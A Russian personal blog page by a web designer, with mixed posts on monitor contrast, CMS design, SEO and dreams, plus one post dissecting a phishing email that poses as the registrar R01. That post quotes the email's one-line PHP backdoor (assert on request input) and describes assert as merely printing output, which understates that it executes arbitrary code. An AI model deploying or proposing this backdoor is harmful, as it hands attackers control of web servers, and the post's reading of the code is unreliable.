Сделать заказ

1. В каких единицах измеряется святость?

2. Одинаковы ли усилия по освящению ведра воды и реки?

3. Почему освящение происходит ежегодно?

4. Из п.3 следует, что освящение имеет период полураспада, следовательно: Каков период полураспада святости?

5. Что произойдет с мусульманином, выпившим N–ное количество святой воды по ошибке?

6. Святость — есть величина константная или определенные качества священника могут повлиять на силу святости каким–либо образом?

7. Когда в данном месте святости становится больше, означает ли это, что, скажем, в Африке, святости убывает?


В частности, когда речь касается контрастности. Они думают, что если им видно — значит и другие увидят.

И речь даже не о том большинстве людей, у кого плохое зрение. Я говорю про обычные компьютеры и стандартную настройку яркости на мониторе или экране ТВ.

Даже, если люди заморачиваются с настройкой яркости — наиболее популярная настройка — для просмотра фильмов, и она не подразумевает возможность просмотра начальных светлых оттенков.

Приведу пример:

Подобные «засвеченные» работы чаще всего бывают недооценены именно из-за того, что ничего не видно.


P.S.: Чтобы быстро проверить яркость вашего монитора — проверьте, видите ли вы мелкозернистый серый фон этого сайта. Если нет — яркость экрана завышена.


Нашел довольно интересную статью с перечислением всех вариантов, как можно заменить меню «гамбургер»



В своей CMS «Движок» эту задачу я решил так: сразу после адреса сайта пишем слово add (англ. «добавить») — откроется добавление страницы.
Конечно, если вы ранее заходили в администрирование сайта по логину и паролю.

Минимум действий.


Получаю письмо. Тут надо заметить, что письма у меня смотрятся хоть и не через браузер, но почтовый клиент также показывает письма в HTML формате и не показывает реальный адрес отправителя (по-умолчанию). Поэтому ухищрения кульных хацкеров не были видны как на ладони (реальный адрес отправителя письма был info@r01l.ru — одна лишняя буква) и доходить до схемы «взлома» пришлось своим умом, анализируя присланное письмо.

Отправитель: "R01.RU"
Тема: Необходима активация домена [один из моих доменов]

Текст:

Уважаемый клиент!
В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменом [один из моих доменов] осуществляется лицом, указанным в качестве его администратора.Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл a7offau12fn0f83f.php со следующим содержимым:
<?php
assert(stripslashes($_REQUEST[R01]));
?>
Файл должен быть создан в течение трех рабочих дней с момента получения настоящего письма и находиться на сервере до 28 декабря 2016 года, 20:00 (UTC+03:00), в противном случае процедура подтверждения не будет пройдена.
Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.
© АО "Регистратор Р01"
8-800-775-37-77,
8-495-616-2747


Что бросается в глаза?

То, что просят создать php-файл. Для проверки обычно достаточно и txt-файла.
Разберем код.
assert — это вывод проверки утверждения. По сути выведет на экран переданную инфу.
stripslashes — удаляет экранирование символов
остается $_REQUEST[R01] — вместо R01 могут написать что угодно. Это то, что передается php-йфалу через POST или GET запрос. И здесь не видно никакой защиты. Получается, что это простой незащищенный файл, который подвержен большинству уязвимостей, через обращение в переменной R01.

Узнал, что аналогичные письма приходят и от имени якобы РосКомНадзора :)

Т.е. цель «хакеров» — не дискриминация определенного сервиса, а временное получение доступа к сайтам.
Зачем?
Отжать домен таким образом не получится.
Удалять файлы обычно бесполезно — есть резервные копии.
Глумиться над сайтами, заменяя картинки — ребячество.
Получить секретную информацию — вряд ли получится, т.к. админ, который на это пойдет, вряд ли будет управлять крупным магазином.
Учитывая волну подобных писем — это не захват определенного сайта.
Остается одно — создание мусорных рекламных сайтов в папках на временно «захваченных» доменах.




10 января 2017 в 14:03

Дизайнер Н. Григорьев (ВНИИТЭ).


10 января 2017 в 13:54


9 января 2017 в 11:15

Фотошоп.
Меню -> Изображение -> Коррекция -> Постеризация
3 или 2.


Если кто не понял — суть в том, какую монету можно использовать в Европе...
А 2 рубля — за 1 евро, но работает не везде.
Да, иной раз можно и сдачу получить из автомата...

Собрались в Европу — возьмите с собой нашу мелочь )


7 января 2017 в 15:10

Когда говорят SEO-продвижение — это тоже самое, что масло масляное, т.к. обычно эти слова означают одно и то же, несмотря на то, что по смыслу SEO относится к продвижению, а продвижение может быть и не SEO. Но для клиентов это не важно — им главное — получить прибыль от продвижения.

SEO — это в первую очередь текстовое наполнение. Т.е. тексты статей, описания артистов и услуг.
Также у каждой страницы есть:
  • TITLE (заголовок окна) — виден на вкладке окна в браузере. Мало влияет на продвижение, обычно совпадает с заголовком страницы.
  • KEYWORDS (ключевые слова) — видно только в коде страницы, доступно поисковым системам. С 2013 года неактуально, т.к. поисковые системы перестали учитывать этот параметр.
  • DESCRIPTION (описание) — видно только в коде страницы, доступно поисковым системам. Рекомендуется заполнять это поле для страниц, где много текста. Это мало влияет на продвижение, намного важнее — сам текст.

Если же говорить про тексты, есть базовые правила при их написании для SEO:
— важен заголовок, подбирается с учетом популярных поисковых запросов по статистике
— количество ключевых слов в тексте не должно быть больше 8% (высчитывается в Ворде по статистике количества слов)
— текст должен быть читабельным, т.е. написанным для людей.

Те, кто заявляет, что SEO хромает — обычно имеют в виду, что можно было бы подобрать DESCRIPTION для всех страниц более адекватно, например, взяв или сочинив одно предложение, которое полностью описывает содержание текста.

Второй тип SEO - закупать ссылки с сайтов вашего региона на ссылочных биржах. Этим я также занимаюсь. Результат даёт не сразу, минимальный через месяц, хороший — через полгода, год. Постепенно повышает посещаемость.

Третий тип продвижения — «пройти» по каталогам, блогам и сайтам, т.е. оставить там свою ссылку. Этот тип практически «умер», т.к. поисковые системы перестали учитывать ссылки с ссылочных «помоек». Несмотря на это, всё еще этот тип продвижения многие продолжают предлагать. Не рекомендую.

Четвертый тип продвижения — каталог или магазин с карточками товара. Очень желательно в этом случае указывать реальную цену.

Пятым типом продвижения иной раз могут назвать скрытую рекламу в текстах. Но это все-таки реклама, а SEO — это повышение места в поисковой выдаче.

Других вариантов нет.


6 января 2017 в 22:53


3 января 2017 в 8:42

1. Представьте, что на сайте нужно организовать два раздела Новости, например: новости компании и новости отрасли. Как это проще всего сделать?

2. Подумайте, как удобнее работать с системой при наличии 20 тысяч страниц. Создайте их с помощью генерации скриптом и посмотрите, как справляется система.

3. Представьте, что администрированием сайта решили заняться не программисты: верстальщик, веб-дизайнер, администратор, секретарь, директор. Какие сложности у них могут возникнуть при самостоятельном освоении? Как упростить их работу? Как ускорить обучение?

4. Проверьте работу вашей CMS на HTTPS, в некорневой папке на сервере, с PHP 7 версии.

5. Если вы создаете свою CMS на чужом фреймворке, подумайте, что будет, если разработчики прекратят развитие фреймворка? Как сложно будет перейти на другой фреймворк и возможно ли это в принципе? Подумайте, на какой именно фреймворк можно было бы перейти. А что на счет других сторонних компонентов?

6. Как осуществляется переход от сайта к редактированию его страниц в администрировании? Насколько это понятно, быстро и просто?

7. Как много ненужной информации видно на главной странице администрирования?

8. Задумайтесь о версионности вашей системы и возможности миграции базы данных от версии к версии.

9. Главное преимущество хорошей CMS - легкость внедрения сверстанного HTML-шаблона. Можете это обеспечить - замечательно.

10. Не забывайте про документацию. Она может быть ориентирована также на разные типы пользователей: редактор, администратор, разработчик.

11. Ошибки неизбежны. И это нормально. Если вы выкладываете свою CMS для свободного скачивания всем (или вашим клиентам), постарайтесь следовать простому правилу: выкладывать новые версии только со вторника по среду, не выкладывать с 15 декабря по 15 января. Это сильно поможет успеть разобраться с возможными ошибками до выходных или праздников. Правило обосновано статистикой.

12. Главное - качество обслуживания клиента и удовлетворения его потребностей. Качество кода вторично, но не является неважным! А вот над качеством архитектуры крайне важно задуматься на первом этапе разработки CMS.

13. Если вы не собираетесь переплюнуть Вордпресс, Друпал и Джумлу - лучше не делайте свою систему бесплатной или очень дешевой. В глазах клиентов (ваших клиентов или клиентов разработчиков, которые используют вашу систему) это будет выглядеть как «Скупой платит дважды».

14. Справится ли ваша CMS со 100 запросами в секунду на недорогом виртуальном сервере? Что нужно, чтобы справилась?

15. Разработка своих собственных компонент намного эффективнее (в плане дальнейшей поддержки) доработки стандартных компонентов — это единственный правильный выбор при разработке любых нетиповых хотелок заказчика именно потому, что код максимально минифицирован и в нем нет того, что не работает. Для этого ваша CMS должна иметь соответствующую справку, примеры реализации дополнений и удобные инструменты. Не забывайте, что реализация нестандартной функциональности через стандартные компоненты обязательно приводит к разведению болота в коде и затрудняет обновление и дальнейшую стороннюю поддержку системы.

16. Подумайте о миграции с других, например, самых популярных CMS.

17. Не забудьте про обработку ошибок. Хорошо, когда при включенном отображении ошибок, ни на одной странице сайта не видно ошибок. Если ошибки возникают - они должны быть не только осмысленны и неповторимы, но и предоставлять возможность найти в коде CMS место возникновения ошибки. Очень плохой пример (PHP): использование @ вместо isset и проверки на null. Пример еще хуже и популярнее - не использовать даже @.

18. Пишите для России - подумайте об интеграции 1С.

Если есть, чем дополнить советы - пишите в комментарии.


Я восстанавливаю старые иконы для облагораживания ежемесячных обложек «Лампады», приложения к газете «Благовест».
Недавно узнал, что на мои иконы молятся. Несмотря на то, что я агностик, было приятно. Возможно потому, что я вкладываю душу в свою работу.

Сейчас издательство переживает не лучшие времена.
Если вы считаете себя православным и любите читать «Благовест» — помогите газете: http://благовестсамара.рф/-help



2 января 2017 в 16:23

Да, это не я. Но очень похож.

Ссылка на видео: http://coub.com/view/f8uc2



2 января 2017 в 10:12

Самостоятельные полеты во сне — пожалуй, лучший опыт, который можно во сне получить.

Вновь приснилось, как летаю во сне. Приятнее всего даже не сам полет, сколько момент осознанного отрыва от земли.

Полет — это очень интересный символ. Кому в детстве не снилось, как он летает! Обычно такой сон трактуется как рост ребенка, его взросление, устремление к новому. Но такие сны снятся даже старикам, так что трактовка явно неверная.

Большинство людей любят летать во сне — так как полет как ничто другое дает ощущение свободы. Я никогда не встречал человека, которому бы не нравилось летать во сне.

В античной культуре Пегас (символ поэтического вдохновения) имеет крылья. Сирены, завлекающие путников своим дивным пением, также изображаются в виде полуптиц. У муз на голове тоже имеются крылья. Таким образом, крылья — являются символом божественного, внеземного. Если герою эпоса даются крылья или иная способность летать, это означает, что он переходит в особое состояние — состояние экстаза, духовного возвышения. Также это можно истолковать как полет на крыльях любви — неземное блаженство.

По Фрейду, полет является символом полового акта. И не только полет, Фрейд почти всё так трактовал. У кого что болит, тот о том и говорит.

Современный психоанализ трактует самостоятельный полет во сне, как желание избежать земного притяжения, а психология считает свободой, способностью преодолевать препятствия и решать проблемы.

Если же проанализировать и сгруппировать около 90 самых популярных сонников, вы узнаете, что полет во сне — это:

— астральное путешествие, выход за пределы физических ограничений

— избегание трудностей и опасностей

— успех в торговле и любви

— в далекое путешествие, к дороге

— стремление занять значительное положение в своем деле

— символ превосходства, самостоятельности, знак благополучия

— желание «улететь» от повседневности и рутины

— сулит несчастливое супружество или скучный брак с неинтересным человеком

— предвещает бесчестие и неприятные новости об отсутствующих

— отражение стремления к Свободе и возможность ее получить

— отражение движения за пределы общепринятых ограничений

— к успеху в делах

— способность взлететь над ситуацией

— богатство, знатность и большое счастье

— хорошие эмоции

— исполнение надежд, успех в делах и любви

— любовные переживания

— вы чувствуете себя в чем-то ограниченным

Значений очень много и все они и многие — противоречивы.

Я не верю сонникам, потому что все они основаны на субъективном ненаучном опыте составителя и его знакомых.

Лучше всего воспринимать сны как фильмы, без эмоционального переноса в реальную жизнь.

Исключение — сильно пугающий вас сон — чаще является позывом в туалет.


© 1999—2024, Влад Мерк

Мои Телеграм-каналы:

💎 Дизайн сайтов: Инновации и тренды
💎 Свежие фишки программирования и разметки (HTML, CSS, PHP, JS)
💎 Всё про искусственный интеллект
💎 Развитие, деньги и бизнес
Интересно – подписывайтесь.
Сайт работает на CMS «Движок»

Задайте вопрос
или пришлите задание для расчета стоимости
или расскажите о вашей ситуации

А можно сразу написать на почту merkvlad@gmail.com
или в Telegram, WhatsApp, Viber.

Фамилия, имя:
Email:
Телефон:
Текст письма: